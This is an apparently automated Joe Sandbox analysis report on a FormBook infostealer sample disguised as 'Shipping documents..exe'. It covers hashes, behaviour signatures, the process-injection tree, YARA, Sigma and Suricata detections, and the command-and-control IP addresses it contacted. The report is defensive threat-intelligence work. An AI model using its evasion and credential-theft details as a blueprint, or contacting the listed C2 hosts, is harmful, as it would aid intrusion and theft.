Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping documents..exe

Overview

General Information

Sample name:Shipping documents..exe
Analysis ID:1549915
MD5:3fbab2b42254852fc8d71f14b2862a43
SHA1:51b8d33a892260ec1d0d5aee4971998756532f0c
SHA256:0452cf013ff76bb1e537ac2b17b081fc2eaf7c5d302f3e838e1e854de2850896
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Shipping documents..exe (PID: 764 cmdline: "C:\Users\user\Desktop\Shipping documents..exe" MD5: 3FBAB2B42254852FC8D71F14B2862A43)
    • svchost.exe (PID: 3924 cmdline: "C:\Users\user\Desktop\Shipping documents..exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FuFneNIzDsF.exe (PID: 6116 cmdline: "C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • srdelayed.exe (PID: 6940 cmdline: "C:\Windows\SysWOW64\srdelayed.exe" MD5: B5F31FDCE1BE4171124B9749F9D2C600)
        • ktmutil.exe (PID: 6812 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • FuFneNIzDsF.exe (PID: 4156 cmdline: "C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ParentImage: C:\Users\user\Desktop\Shipping documents..exe, ParentProcessId: 764, ParentProcessName: Shipping documents..exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ProcessId: 3924, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine: "C:\Users\user\Desktop\Shipping documents..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ParentImage: C:\Users\user\Desktop\Shipping documents..exe, ParentProcessId: 764, ParentProcessName: Shipping documents..exe, ProcessCommandLine: "C:\Users\user\Desktop\Shipping documents..exe", ProcessId: 3924, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T08:39:13.534070+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649753TCP
                2024-11-06T08:39:51.605543+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649957TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T08:39:43.494387+010020507451Malware Command and Control Activity Detected192.168.2.649911154.92.61.3780TCP
                2024-11-06T08:40:07.142021+010020507451Malware Command and Control Activity Detected192.168.2.6499863.33.130.19080TCP
                2024-11-06T08:40:20.672098+010020507451Malware Command and Control Activity Detected192.168.2.649990203.161.49.19380TCP
                2024-11-06T08:40:34.357565+010020507451Malware Command and Control Activity Detected192.168.2.6499953.33.130.19080TCP
                2024-11-06T08:40:47.887323+010020507451Malware Command and Control Activity Detected192.168.2.6499993.33.130.19080TCP
                2024-11-06T08:41:01.413455+010020507451Malware Command and Control Activity Detected192.168.2.650003198.252.98.5480TCP
                2024-11-06T08:41:15.086787+010020507451Malware Command and Control Activity Detected192.168.2.650008103.224.182.24280TCP
                2024-11-06T08:41:29.435247+010020507451Malware Command and Control Activity Detected192.168.2.650012154.23.184.21880TCP
                2024-11-06T08:41:43.525575+010020507451Malware Command and Control Activity Detected192.168.2.65001631.31.196.1780TCP
                2024-11-06T08:41:57.262565+010020507451Malware Command and Control Activity Detected192.168.2.65002013.248.169.4880TCP
                2024-11-06T08:42:11.112133+010020507451Malware Command and Control Activity Detected192.168.2.650024217.76.156.25280TCP
                2024-11-06T08:42:25.010909+010020507451Malware Command and Control Activity Detected192.168.2.650029161.97.142.14480TCP
                2024-11-06T08:42:38.520024+010020507451Malware Command and Control Activity Detected192.168.2.650033199.59.243.22780TCP
                2024-11-06T08:42:52.287067+010020507451Malware Command and Control Activity Detected192.168.2.650037188.114.97.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T08:39:43.494387+010028554651A Network Trojan was detected192.168.2.649911154.92.61.3780TCP
                2024-11-06T08:40:07.142021+010028554651A Network Trojan was detected192.168.2.6499863.33.130.19080TCP
                2024-11-06T08:40:20.672098+010028554651A Network Trojan was detected192.168.2.649990203.161.49.19380TCP
                2024-11-06T08:40:34.357565+010028554651A Network Trojan was detected192.168.2.6499953.33.130.19080TCP
                2024-11-06T08:40:47.887323+010028554651A Network Trojan was detected192.168.2.6499993.33.130.19080TCP
                2024-11-06T08:41:01.413455+010028554651A Network Trojan was detected192.168.2.650003198.252.98.5480TCP
                2024-11-06T08:41:15.086787+010028554651A Network Trojan was detected192.168.2.650008103.224.182.24280TCP
                2024-11-06T08:41:29.435247+010028554651A Network Trojan was detected192.168.2.650012154.23.184.21880TCP
                2024-11-06T08:41:43.525575+010028554651A Network Trojan was detected192.168.2.65001631.31.196.1780TCP
                2024-11-06T08:41:57.262565+010028554651A Network Trojan was detected192.168.2.65002013.248.169.4880TCP
                2024-11-06T08:42:11.112133+010028554651A Network Trojan was detected192.168.2.650024217.76.156.25280TCP
                2024-11-06T08:42:25.010909+010028554651A Network Trojan was detected192.168.2.650029161.97.142.14480TCP
                2024-11-06T08:42:38.520024+010028554651A Network Trojan was detected192.168.2.650033199.59.243.22780TCP
                2024-11-06T08:42:52.287067+010028554651A Network Trojan was detected192.168.2.650037188.114.97.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-06T08:40:00.378127+010028554641A Network Trojan was detected192.168.2.6499833.33.130.19080TCP
                2024-11-06T08:40:02.083678+010028554641A Network Trojan was detected192.168.2.6499843.33.130.19080TCP
                2024-11-06T08:40:04.597512+010028554641A Network Trojan was detected192.168.2.6499853.33.130.19080TCP
                2024-11-06T08:40:13.021440+010028554641A Network Trojan was detected192.168.2.649987203.161.49.19380TCP
                2024-11-06T08:40:15.547543+010028554641A Network Trojan was detected192.168.2.649988203.161.49.19380TCP
                2024-11-06T08:40:18.109970+010028554641A Network Trojan was detected192.168.2.649989203.161.49.19380TCP
                2024-11-06T08:40:26.374694+010028554641A Network Trojan was detected192.168.2.6499913.33.130.19080TCP
                2024-11-06T08:40:28.933962+010028554641A Network Trojan was detected192.168.2.6499933.33.130.19080TCP
                2024-11-06T08:40:31.782789+010028554641A Network Trojan was detected192.168.2.6499943.33.130.19080TCP
                2024-11-06T08:40:40.033394+010028554641A Network Trojan was detected192.168.2.6499963.33.130.19080TCP
                2024-11-06T08:40:42.594794+010028554641A Network Trojan was detected192.168.2.6499973.33.130.19080TCP
                2024-11-06T08:40:45.156854+010028554641A Network Trojan was detected192.168.2.6499983.33.130.19080TCP
                2024-11-06T08:40:53.673384+010028554641A Network Trojan was detected192.168.2.650000198.252.98.5480TCP
                2024-11-06T08:40:56.299646+010028554641A Network Trojan was detected192.168.2.650001198.252.98.5480TCP
                2024-11-06T08:40:59.697416+010028554641A Network Trojan was detected192.168.2.650002198.252.98.5480TCP
                2024-11-06T08:41:07.459323+010028554641A Network Trojan was detected192.168.2.650005103.224.182.24280TCP
                2024-11-06T08:41:10.004531+010028554641A Network Trojan was detected192.168.2.650006103.224.182.24280TCP
                2024-11-06T08:41:12.550081+010028554641A Network Trojan was detected192.168.2.650007103.224.182.24280TCP
                2024-11-06T08:41:21.763239+010028554641A Network Trojan was detected192.168.2.650009154.23.184.21880TCP
                2024-11-06T08:41:24.322356+010028554641A Network Trojan was detected192.168.2.650010154.23.184.21880TCP
                2024-11-06T08:41:26.871250+010028554641A Network Trojan was detected192.168.2.650011154.23.184.21880TCP
                2024-11-06T08:41:35.712995+010028554641A Network Trojan was detected192.168.2.65001331.31.196.1780TCP
                2024-11-06T08:41:38.228622+010028554641A Network Trojan was detected192.168.2.65001431.31.196.1780TCP
                2024-11-06T08:41:40.806800+010028554641A Network Trojan was detected192.168.2.65001531.31.196.1780TCP
                2024-11-06T08:41:49.471369+010028554641A Network Trojan was detected192.168.2.65001713.248.169.4880TCP
                2024-11-06T08:41:52.009629+010028554641A Network Trojan was detected192.168.2.65001813.248.169.4880TCP
                2024-11-06T08:41:54.616427+010028554641A Network Trojan was detected192.168.2.65001913.248.169.4880TCP
                2024-11-06T08:42:03.545297+010028554641A Network Trojan was detected192.168.2.650021217.76.156.25280TCP
                2024-11-06T08:42:06.056427+010028554641A Network Trojan was detected192.168.2.650022217.76.156.25280TCP
                2024-11-06T08:42:08.558522+010028554641A Network Trojan was detected192.168.2.650023217.76.156.25280TCP
                2024-11-06T08:42:17.393054+010028554641A Network Trojan was detected192.168.2.650026161.97.142.14480TCP
                2024-11-06T08:42:19.926700+010028554641A Network Trojan was detected192.168.2.650027161.97.142.14480TCP
                2024-11-06T08:42:22.488516+010028554641A Network Trojan was detected192.168.2.650028161.97.142.14480TCP
                2024-11-06T08:42:30.853335+010028554641A Network Trojan was detected192.168.2.650030199.59.243.22780TCP
                2024-11-06T08:42:33.416565+010028554641A Network Trojan was detected192.168.2.650031199.59.243.22780TCP
                2024-11-06T08:42:35.970041+010028554641A Network Trojan was detected192.168.2.650032199.59.243.22780TCP
                2024-11-06T08:42:44.567492+010028554641A Network Trojan was detected192.168.2.650034188.114.97.380TCP
                2024-11-06T08:42:47.149297+010028554641A Network Trojan was detected192.168.2.650035188.114.97.380TCP
                2024-11-06T08:42:49.751293+010028554641A Network Trojan was detected192.168.2.650036188.114.97.380TCP
                2024-11-06T08:42:58.661949+010028554641A Network Trojan was detected192.168.2.6500383.33.130.19080TCP
                2024-11-06T08:43:01.193658+010028554641A Network Trojan was detected192.168.2.6500393.33.130.19080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Shipping documents..exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Shipping documents..exeJoe Sandbox ML: detected
                Source: Shipping documents..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FuFneNIzDsF.exe, 00000004.00000002.4559487578.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, FuFneNIzDsF.exe, 00000008.00000000.2507028325.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdbGCTL source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping documents..exe, 00000000.00000003.2122204716.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Shipping documents..exe, 00000000.00000003.2116752681.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2433300541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339806814.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433300541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337559785.0000000003300000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000002.4569169895.00000000034BE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569169895.0000000003320000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2443745959.0000000003178000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2441691233.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.2433159494.0000000003012000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2433135384.0000000003000000.00000004.00000020.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000004.00000003.2377390282.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: srdelayed.pdb source: FuFneNIzDsF.exe, 00000004.00000003.2377105462.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4569488926.000000000394C000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000325C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.000000001566C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0299C810 FindFirstFileW,FindNextFileW,FindClose,6_2_0299C810
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax6_2_02989F20
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then pop edi6_2_0298E50B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h6_2_031C04DF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49911 -> 154.92.61.37:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49911 -> 154.92.61.37:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50016 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50016 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49986 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49986 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49984 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 31.31.196.17:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50039 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50036 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 198.252.98.54:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50024 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 154.23.184.218:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50034 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 103.224.182.242:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50033 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50033 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49990 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49983 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49990 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 154.23.184.218:80
